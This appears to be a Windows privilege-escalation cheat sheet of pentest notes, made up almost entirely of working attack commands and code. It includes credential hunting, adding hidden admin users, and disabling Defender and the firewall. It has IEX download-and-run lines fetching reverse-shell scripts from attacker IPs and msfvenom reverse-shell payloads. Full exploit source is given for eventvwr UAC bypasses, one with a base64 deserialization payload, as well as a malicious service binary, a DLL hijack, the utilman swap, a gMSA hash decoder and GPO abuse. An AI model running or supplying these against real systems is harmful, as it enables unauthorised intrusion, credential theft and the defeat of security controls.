PrivESC
Privilege Escalation 
Windows
Find Files
findstr /si password *.txt
dir /s *foo*
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
dir "c:\Program Files (x86)"
dir "C:\Program Files"
dir /s /b /a:-d-h \Users\alfred | findstr /i /v "appdata"
Add user
net user Administrator 5HdY8BR9eeL # change password - overwrites the current one (irreversible and very noticeable); prefer adding a new user
net user usuario1 5HdY8BR9eeL /add #adduser
net localgroup administrators usuario1 /add
net localgroup "Remote Desktop Users" UserLoginName /add # adduser to RDP
System Information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
echo %username%
whoami /groups
whoami /all
net users
net user usuario111
mountvol
C:\Windows\System32\drivers\etc\hosts
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ # EnableLUA = 1 means UAC is on; also check ConsentPromptBehaviorAdmin (0 = admins elevate without a prompt)
whoami /priv
whoami /user
net use
net share
net localgroup administrators
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" # auto-start services whose binary lives outside C:\Windows
qwinsta
[Environment]::Is64BitProcess
Credentials
cmdkey /list
dir /s Unattend.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Network Information
netstat -ano
netstat -ano |findstr "LISTENING"
ipconfig /all
route print
netstat -ano
arp -a
Firewall Rules
#cmd
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh advfirewall show allprofiles state
netsh advfirewall firewall show rule name=all
netsh advfirewall set allprofiles state off # disable all profiles (needs admin, very noisy) - prefer adding a single allow rule
netsh advfirewall reset #reset default
#powershell
get-netfirewallrule -all
get-netfirewallrule -policystore configurableservicestore -all
Get-NetFirewallRule -Direction Inbound -Enabled True
#open port
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=out action=allow protocol=TCP localport=139
Process and Services
#CMD
net start
tasklist /SVC
tasklist /svc | findstr /spin "string we search"
tasklist | findstr "nameofstring"
taskkill /IM "process name" /F
taskkill /F /PID pid_number
driverquery /v
schtasks /query /fo LIST /v # scheduled tasks
#Powershell
taskkill /F /PID pid_number
Get-Process
Stop-Process -Name "ProcessName" -Force
Stop-Process -ID PID -Force
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} #select app
Defender
sc query windefend # check defender
sc stop WinDefend # needs admin; usually fails while Tamper Protection is on (protected service)
Set-MpPreference -DisableRealtimeMonitoring $true # disable real-time monitoring (ignored when Tamper Protection is on)
Uninstall-WindowsFeature -Name Windows-Defender # uninstall Defender (Windows Server only - the cmdlet does not exist on client editions)
Applications
wmic product get name, version, vendor # applications
wmic qfe get Caption, Description, HotFixID, InstalledOn # updates
wmic service list brief | findstr "Running" # services
sc qc RemoteMouseService # info app
Powershell Bypass
Get-ExecutionPolicy -List
powershell.exe -nop -exec bypass
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
powershell -ExecutionPolicy Bypass -File admin.ps1
powershell -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.229/Invoke-PowerShellTcp.ps1')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe .\file.ps1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe .\file.ps1
#Disable
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy
powershell.exe Start-Process cmd.exe -Verb runAs
runas /user:admin "C:\Windows\notepad.exe"
runas /netonly /user:mycorp.local\adminacm "cmd /c SHUTDOWN -m \\DES00028 -r -f"
#Powershell01
# Run a command locally as another user (needs WinRM enabled even for localhost).
# -Credential expects the PSCredential object, not the SecureString.
$pass = ConvertTo-SecureString 'Passw0rd2' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("morty.smith", $pass)
Invoke-Command -ComputerName localhost -ScriptBlock { whoami } -Credential $cred
#Powershell02
# Launch a binary under different credentials: Start-Process -Credential needs
# the password wrapped in a PSCredential (plain text -> SecureString -> credential).
$username = 'svc_mssql'
$password = 'trustno1'
$securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword
Start-Process -FilePath reverse.exe -Credential $credential
#Invoke-RunasCs
https://github.com/antonioCoco/RunasCs
. .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 whoami
Invoke-RunasCs -Username user1 -Password password1 -Command "whoami"
#Remote Powershell Session
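# Open an interactive remote PowerShell session as another (domain) user.
$username = "access\svc_mssql";
$password = "trustno1";
# Build the SecureString character by character (equivalent to ConvertTo-SecureString -AsPlainText -Force).
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $secstr;
# Keep the session object: the original 'Enter-PSSession 1' assumed the new
# session got Id 1, which is wrong as soon as any other session exists in
# this PowerShell process.
$session = New-PSSession -ComputerName nameofthehost -Credential $cred;
Enter-PSSession -Session $session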
#Remote Powershell Session THM way
# THM-style variant: build the credential, then either enter an interactive
# session or run a single script block remotely.
$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force;
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword;
Enter-PSSession -ComputerName TARGET -Credential $credential
# Non-interactive: run one script block on the remote host instead of entering the session
Invoke-Command -ComputerName TARGET -Credential $credential -ScriptBlock {whoami}
Tricks
Bypass eventvwr.exe
# Check privs
whoami /priv
# EnableLUA = 1 means UAC is on; ConsentPromptBehaviorAdmin must not be 2 ("Always notify"), since that level prompts for auto-elevating binaries like eventvwr.exe and defeats this bypass
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
# check if evetvwr.exe exists
where /r C:\windows eventvwr.exe
# 32bits
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.205 LPORT=3333 -f exe -o 3333.exe
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.205 LPORT=4444 -f exe -o 4444.exe
# 64bits
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.119.205 LPORT=3333 -f exe -o 3333.exe
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.119.205 LPORT=4444 -f exe -o 4444.exe
compile
i686-w64-mingw32-gcc exploit.c -o exploit.exe # 32bits
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe # 64bits
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
/*
* Pretty standard code to recursively nuke a Reg Key
*/
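/*
 * Recursively delete HKCU\<lpSubKey> and every key beneath it.
 *
 * lpSubKey must be a writable buffer with room for "\\<subkey>" to be
 * appended (RegDelnode passes MAX_PATH*2): the string is extended in place
 * while descending and restored before returning.  Returns non-zero on
 * success (or if the key did not exist), zero if a key could not be opened
 * or deleted.  RegDeleteKey only removes keys without subkeys, hence the
 * recursion.  The code mixes TCHAR/lstrlen with strcpy, so it only builds
 * as ANSI (no UNICODE define), which is what the mingw commands above give.
 */
int RegDelnodeRecurse (LPTSTR lpSubKey) {
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    /* Fast path: a leaf key can be deleted directly. */
    lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);
    if (lResult == ERROR_SUCCESS) return 1;

    lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);
    /* A missing key counts as "already gone"; any other error is a failure. */
    if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;

    /* Append a separator so subkey names can be written right after it. */
    lpEnd = lpSubKey + lstrlen(lpSubKey);
    *lpEnd++ = '\\';
    *lpEnd = '\0';

    /* Always enumerate index 0: each successful recursive delete removes the
     * key just visited, so the next subkey shifts into slot 0. */
    dwSize = MAX_PATH;
    if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
        do {
            strcpy(lpEnd, szName);
            if (!RegDelnodeRecurse(lpSubKey)) break;
            /* dwSize is in/out: RegEnumKeyEx overwrites it with the length of
             * the name it returned, so it must be reset before every call or a
             * longer sibling name fails with ERROR_MORE_DATA and the loop
             * stops early, leaving the tree (and the final delete) broken. */
            dwSize = MAX_PATH;
            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
        } while (lResult == ERROR_SUCCESS);
    }

    /* Restore the caller's string before deleting the now-empty key. */
    lpEnd--;
    *lpEnd = TEXT('\0');
    RegCloseKey(hKey);

    return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}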
/*
* Wrapper for above
*/
/* Delete HKCU\Software\Classes\mscfile and everything under it. */
int RegDelnode() {
    /* Oversized on purpose: RegDelnodeRecurse appends "\\<subkey>" to this
     * buffer in place while walking the tree. */
    TCHAR szDelKey[MAX_PATH * 2];
    lstrcpy(szDelKey, "Software\\Classes\\mscfile");
    return RegDelnodeRecurse(szDelKey);
}
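/*
 * UAC bypass via eventvwr.exe (auto-elevating, high-integrity).  The viewer
 * resolves the "mscfile" handler to open its .msc, and the per-user
 * HKCU\Software\Classes hive is consulted before HKLM, so pointing
 * HKCU\Software\Classes\mscfile\shell\open\command at our payload makes the
 * elevated process launch it.  Needs a medium-integrity shell belonging to a
 * local admin, with UAC not set to "Always notify".
 *
 * NOTE(review): this HKCU mscfile variant is documented against Windows 7/8.1
 * and early Windows 10; newer builds reportedly no longer honour the per-user
 * key - confirm on the target before relying on it.
 */
void __c_exploitUAC() {
    char curDir[MAX_PATH], curPath[MAX_PATH * 2], evtVwr[MAX_PATH * 2];
    const char *sysRoot;
    DWORD dirLen;
    HKEY attackKey;
    SHELLEXECUTEINFO exInfo;

    /* curPath is the command to elevate: here 3333.exe next to this binary.
     * snprintf instead of strcat/sprintf so a long cwd cannot overflow. */
    dirLen = GetCurrentDirectory(MAX_PATH, curDir);
    if (dirLen == 0 || dirLen >= MAX_PATH) return;
    snprintf(curPath, sizeof(curPath), "%s\\3333.exe", curDir);

    sysRoot = getenv("SYSTEMROOT");
    if (!sysRoot) return;  /* sprintf("%s", NULL) would crash */
    snprintf(evtVwr, sizeof(evtVwr), "%s\\System32\\eventvwr.exe", sysRoot);

    /* Start from a clean key so a stale value from an earlier run cannot win. */
    if (!RegDelnode()) return;
    if (RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey) != ERROR_SUCCESS) return;
    /* REG_SZ data must include the terminating NUL; strlen alone drops it. */
    RegSetValueEx(attackKey, "", 0, REG_SZ, (const BYTE *)curPath, (DWORD)(strlen(curPath) + 1));
    RegCloseKey(attackKey);

    /* Zero the struct: fields we do not set (lpClass, hkeyClass, dwHotKey,
     * hIcon/hMonitor) were previously left as uninitialised stack garbage. */
    ZeroMemory(&exInfo, sizeof(exInfo));
    exInfo.cbSize = sizeof(SHELLEXECUTEINFO);
    exInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
    exInfo.lpVerb = "open";
    exInfo.lpFile = evtVwr;
    exInfo.nShow = SW_HIDE;  /* == 0, as before */

    /* Only wait/terminate if the launch actually produced a process handle. */
    if (ShellExecuteEx(&exInfo) && exInfo.hProcess) {
        Sleep(5000);  /* give eventvwr time to spawn the payload */
        TerminateProcess(exInfo.hProcess, 0);
        CloseHandle(exInfo.hProcess);
    }

    /* Always remove the hijack key again, whether or not the launch worked. */
    RegDelnode();
}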
/* Entry point: arguments are ignored, the bypass runs unconditionally. */
int main(int argc, char *argv[]) {
    (void)argc;
    (void)argv;
    __c_exploitUAC();
    return 0;
}
1. Upload to target exploit.exe + 2xrevshells + PsExec
2. listen with nc on 3333 and run exploit.exe
3. listen with nc on 4444 and with new shell run :
c:\> PsExec.exe -i -accepteula -d -s c:\path\4444.exe
4. You have new admin shell
https://github.com/CsEnox/EventViewer-UACBypass
# UAC bypass through Event Viewer (CsEnox/EventViewer-UACBypass).  eventvwr.exe
# auto-elevates and reads back %LOCALAPPDATA%\Microsoft\Event Viewer\RecentViews
# on start; a crafted serialized object written there makes the elevated process
# run our command.  Usage: Invoke-EventViewer <command>.  WriteFile (defined
# below) drops the payload file.  Artifacts left on disk afterwards:
# C:\Windows\Tasks\EventViewerRCE.ps1, C:\Windows\Tasks\p4yl0ad and RecentViews.
function Invoke-EventViewer {
    if ($args){
        echo "[+] Running"
        echo "[1] Crafting Payload"
        $command = $args[0]
        # Closes Event Viewer and then runs user command.
        # The script path is referenced from inside the serialized payload (its
        # embedded "powershell -e" blob appears to point at
        # C:\Windows\Tasks\EventViewerRCE.ps1), so renaming this file requires
        # re-encoding $payload as well.
        echo 'Stop-Process -name mmc*' > C:\Windows\Tasks\EventViewerRCE.ps1
        echo $command >> C:\Windows\Tasks\EventViewerRCE.ps1
        # Base64 .NET BinaryFormatter payload; the decoded data appears to be a
        # System.Data.DataSet wrapping an ObjectDataProvider that calls
        # Process.Start on cmd.  Whitespace inside the string is ignored by
        # FromBase64String, so the line break below is harmless.
        $payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0CgAAABZEYXRhU2V0LlJlbW90aW5nRm9ybWF0E0RhdGFTZXQuRGF0YVNldE5hbWURRGF0YVNldC5OYW1lc3BhY2UORGF0YVNldC5QcmVmaXgVRGF0YVNldC5DYXNlU2Vuc2l0aXZlEkRhdGFTZXQuTG9jYWxlTENJRBpEYXRhU2V0LkVuZm9yY2VDb25zdHJhaW50cxpEYXRhU2V0LkV4dGVuZGVkUHJvcGVydGllcxREYXRhU2V0LlRhYmxlcy5Db3VudBBEYXRhU2V0LlRhYmxlc18wBAEBAQAAAAIABx9TeXN0ZW0uRGF0YS5TZXJpYWxpemF0aW9uRm9ybWF0AgAAAAEIAQgCAgAAAAX9////H1N5c3RlbS5EYXRhLlNlcmlhbGl6YXRpb25Gb3JtYXQBAAAAB3ZhbHVlX18ACAIAAAABAAAABgQAAAAACQQAAAAJBAAAAAAJBAAAAAoBAAAACQUAAAAPBQAAAH8EAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAoQc8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgcG93ZXJzaGVsbC5leGUgLW5vcCAtZSBVd0JsQUhRQUxRQkZBSGdBWlFCakFIVUFkQUJwQUc4QWJnQlFBRzhBYkFCcEFHTUFlUUFnQUVJQWVRQndBR0VBY3dCekFDQUFMUUJUQUdNQWJ3QndBR1VBSUFCREFIVUFjZ0J5QUdVQWJnQjBBRlVBY3dCbEFISUFPd0FnQUVNQU9nQmNBRmNBYVFCdUFHUUFid0IzQUhNQVhBQlVBR0VBY3dCckFITUFYQUJGQUhZQVpRQnVBSFFBVmdCcEFHVUFkd0JsQUhJQVVnQkRBRVVBTGdCd0FITUFNUUE9IiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIg
TG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgsL'
        # Decode to a staging file; WriteFile moves it into the RecentViews location.
        [IO.File]::WriteAllBytes("C:\Windows\Tasks\p4yl0ad", [Convert]::FromBase64String($payload))
        echo "[2] Writing Payload"
        WriteFile
        echo "[3] Finally, invoking eventvwr"
        # Launch the auto-elevating viewer; it deserializes RecentViews on start.
        eventvwr
    }
    else {
        echo '[-] Usage: Invoke-EventViewer commandhere'
        echo 'Example: Invoke-EventViewer cmd.exe'
    }
}
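# Drop the staged payload (C:\Windows\Tasks\p4yl0ad) where eventvwr.exe reads it
# back: %LOCALAPPDATA%\Microsoft\Event Viewer\RecentViews.  Both branches now use
# the long-name path; the original copied to "...\Microsoft\EventV~1\RecentViews"
# when the folder already existed, which only works while 8.3 short names are
# enabled on the volume.
function WriteFile {
    $Folder = $env:LOCALAPPDATA + '\Microsoft\Event Viewer'
    if (Test-Path -Path $Folder) {
        "[+] EventViewer Folder exists"
    } else {
        "[+] EventViewer Folder doesn't exist. Will create one"
        mkdir $Folder
    }
    # Quoted because the folder name contains a space.
    copy C:\Windows\Tasks\p4yl0ad "$Folder\RecentViews"
}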
Weak Service Permissions (replace a writable service binary)
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} # like tasklist
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | Select-String 'Program Files' # like tasklist with grep
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # service permission
wmic service where caption="Serviio" get name, caption, state, startmode # service info
#include <stdlib.h>
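/*
 * Payload dropped in place of a service binary that runs as LocalSystem:
 * creates a local user and adds it to Administrators.  This is not a real
 * service, so the SCM will typically report a start failure - the commands
 * have already run by then.  Exit status is non-zero if either net command
 * fails, which makes a failed attempt visible when run by hand.
 */
int main(void)
{
    if (system("net user usuario1 p4ssw0rd /add") != 0)
        return 1;
    return system("net localgroup administrators usuario1 /add") != 0;
}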
i686-w64-mingw32-gcc adduser.c -o adduser.exe
#Replace service
move "c:\Program Files\Serviio\bin\ServiioService.exe" old.exe
move adduser.exe "c:\Program Files\Serviio\bin\ServiioService.exe"
#Restart service or restart machine
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
shutdown /r /t 0
#Check new user
net users
net localgroup administrators
DLL Hijacking
#include <windows.h>
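/*
 * Minimal DLL-hijack payload: when the vulnerable service loads this DLL it
 * runs a command as the service account, then terminates the host process.
 *
 * Caveats: DllMain runs under the loader lock, so spawning processes from it
 * is officially unsupported and can deadlock in some hosts - good enough for
 * a one-shot privesc check, but a cleaner payload would do the work from a
 * new thread.  C:\Temp must already exist or the redirect fails silently.
 */
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    (void)hDll;
    (void)lpReserved;
    if (dwReason == DLL_PROCESS_ATTACH) {
        /* "/c" runs the command and exits.  The original used "/k", which
         * keeps cmd.exe alive after the command, so system() may never
         * return and ExitProcess below is never reached. */
        system("cmd.exe /c whoami > C:\\Temp\\dll.txt");
        /* Kill the host so the hijacked service does not keep our DLL loaded. */
        ExitProcess(0);
    }
    return TRUE;
}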
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
sc stop dllsvc & sc start dllsvc
Unquoted Service
wmic service get name,displayname,pathname,startmode
sc qc unquotedsvc
.\accesschk64.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.74.25 LPORT=443 -f exe -o evil.exe
sc stop unquotedsvc
sc start unquotedsvc
AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # both the HKCU and the HKLM value must be 1 for the MSI to run as SYSTEM
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.193.228 LPORT=443 -f msi -o evil.msi
msiexec /quiet /qn /i C:\evil.msi
SysInternals
powershell winget install sysinternals
#CMD
AccessChk -uws "Everyone" "C:\Program Files"
accesschk.exe -uwcqv "testuser" *
#Powershell
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Sigcheck -a -m C:\Windows\System32\fodhelper.exe
PsExec.exe \\dc01 cmd.exe
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe
Abuses
ReadGMSAPassword
Get-ADServiceAccount -Filter *
Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword
Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
(Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword').'msDS-MAnagedPassword'
1) save numbers to file gmsa
2) convert to onliner:
tr '\n' ',' < gmsa > gmsacoma
3) replace output in gmsadecode.py data = []
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, SASL, KERBEROS, extend, SUBTREE
import argparse
import binascii
from Cryptodome.Hash import MD4
from impacket.ldap.ldaptypes import ACE, ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, LDAP_SID, SR_SECURITY_DESCRIPTOR
from impacket.structure import Structure
import sys
# Paste the msDS-ManagedPassword byte values here as a comma-separated list
# (the "gmsacoma" one-liner produced above), e.g. data = [1, 0, 0, 0, ...].
data = []
# The blob parser below expects raw bytes, not a list of ints.
data = bytes(data)
class MSDS_MANAGEDPASSWORD_BLOB(Structure):
    """Parser for the msDS-ManagedPassword attribute blob of a gMSA.

    The fixed header holds a version, a reserved field, the total length and
    four 16-bit offsets; the variable-length fields are sliced out of the raw
    data by fromString() using those offsets.  Offsets are relative to the
    start of the blob.  Field layout follows the impacket Structure format
    strings below ('<H' little-endian uint16, '<L' little-endian uint32,
    ':' raw bytes filled in manually).
    """
    structure = (
        ('Version', '<H'),
        ('Reserved', '<H'),
        ('Length', '<L'),
        ('CurrentPasswordOffset', '<H'),
        ('PreviousPasswordOffset', '<H'),
        ('QueryPasswordIntervalOffset', '<H'),
        ('UnchangedPasswordIntervalOffset', '<H'),
        ('CurrentPassword', ':'),
        ('PreviousPassword', ':'),
        # ('AlignmentPadding', ':'),
        ('QueryPasswordInterval', ':'),
        ('UnchangedPasswordInterval', ':'),
    )

    def __init__(self, data: bytes | None = None) -> None:
        Structure.__init__(self, data=data)

    def fromString(self, data: bytes) -> None:
        """Parse the header via Structure, then cut the variable fields by offset."""
        Structure.fromString(self, data)
        # CurrentPassword runs up to the next populated field: the previous
        # password if there is one, otherwise the query interval.
        if self['PreviousPasswordOffset'] == 0:
            endData = self['QueryPasswordIntervalOffset']
        else:
            endData = self['PreviousPasswordOffset']
        self['CurrentPassword'] = self.rawData[self['CurrentPasswordOffset']:][:endData - self['CurrentPasswordOffset']]
        # A zero offset means "no previous password" (first password cycle).
        if self['PreviousPasswordOffset'] != 0:
            self['PreviousPassword'] = self.rawData[self['PreviousPasswordOffset']:][:self['QueryPasswordIntervalOffset'] - self['PreviousPasswordOffset']]
        self['QueryPasswordInterval'] = self.rawData[self['QueryPasswordIntervalOffset']:][:self['UnchangedPasswordIntervalOffset'] - self['QueryPasswordIntervalOffset']]
        # Last field: everything from its offset to the end of the blob.
        self['UnchangedPasswordInterval'] = self.rawData[self['UnchangedPasswordIntervalOffset']:]
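# Fail early with a clear message instead of an obscure struct error when the
# byte list above was not filled in.
if not data:
    sys.exit("paste the msDS-ManagedPassword byte values into `data` first")

blob = MSDS_MANAGEDPASSWORD_BLOB()
blob.fromString(data)

# CurrentPassword is the UTF-16LE password followed by a 2-byte NUL terminator;
# the NT hash is MD4 over the password bytes without that terminator, so the
# printed value can be used directly for pass-the-hash.
# (renamed from `hash`, which shadowed the builtin)
md4 = MD4.new()
md4.update(blob['CurrentPassword'][:-2])
nt_hash = binascii.hexlify(md4.digest()).decode("utf-8")
print(nt_hash)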
# python3 gmsadecode.py
1808d2c09d9e6a0edc419a4b13868c92
SeRestorePrivilege
move C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.old
move C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
rdesktop 192.168.120.91
Press WIN + U at the logon screen (utilman.exe is launched there as SYSTEM); move utilman.old back afterwards
#links
https://github.com/xct/SeRestoreAbuse
https://github.com/dxnboy/redteam
#Exploit
.\SeRestoreAbuse.exe "cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.164/shell.ps1')"
SeBackupPrivilege
function Acl-FullControl {
    param ($user, $path)
    # Appends an Allow/FullControl ACE for $user (inherited by subfolders and
    # files) to the DACL of $path and prints the ACL before and after so the
    # change can be reverted by hand.  With no arguments it prints the help.
    # NOTE(review): the author's help text says SeBackupPrivilege; writing a
    # DACL normally needs WRITE_DAC or SeRestorePrivilege - confirm which one
    # actually makes Set-Acl succeed on the target.
    $help = @"
.SYNOPSIS
Acl-FullControl
PowerShell Function: Acl-FullControl
Author: Luis Vacas (CyberVaca)
Required dependencies: None
Optional dependencies: None
.DESCRIPTION
.EXAMPLE
Acl-FullControl -user domain\usuario -path c:\users\administrador
Description
-----------
If you have the SeBackupPrivilege privilege. You can change the permissions to the path you select.
"@
    if ($null -eq $user -or $null -eq $path) {
        $help
        return
    }
    "[+] Current permissions:"
    Get-Acl $path | Format-List
    "[+] Changing permissions to $path"
    $dacl = Get-Acl $path
    $ruleArgs = @($user, 'FullControl', 'ContainerInherit,ObjectInherit', 'None', 'Allow')
    $rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule -ArgumentList $ruleArgs
    $dacl.AddAccessRule($rule)
    Set-Acl -Path $path -AclObject $dacl
    "[+] Acls changed successfully."
    Get-Acl -Path $path | Format-List
}
. .\Acl-FullControl.ps1
Acl-FullControl -user VAULT\anirudh -path c:\users\administrator
SeCreateGlobalPrivilege
PS C:\wamp> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
#Link
https://github.com/itm4n/FullPowers
#Run
FullPowers.exe -x
FullPowers.exe -c "c:\users\Public\Music\r.exe"
#The spawned process gets the service account's full default privilege set back (including SeImpersonatePrivilege per the tool's README), which can then be abused with an impersonation (potato-style) exploit
SeManageVolumePrivilege
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\xampp\htdocs\uploads>SeManageVolumeExploit.exe
Entries changed: 918
DONE
GPOabuse
Get-NetGPO
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
#Link
https://github.com/FuzzySecurity/StandIn
#Check
.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
#Exploit
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
gpupdate /force
net localgroup administrators
#Link
https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_x86/SharpGPOAbuse.exe
#Exploit
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
gpupdate /force
net localgroup administrators
Helpers
#WCMDump
https://github.com/peewpw/Invoke-WCMDump
.\Invoke-WCMDump.ps1
#WinPeas
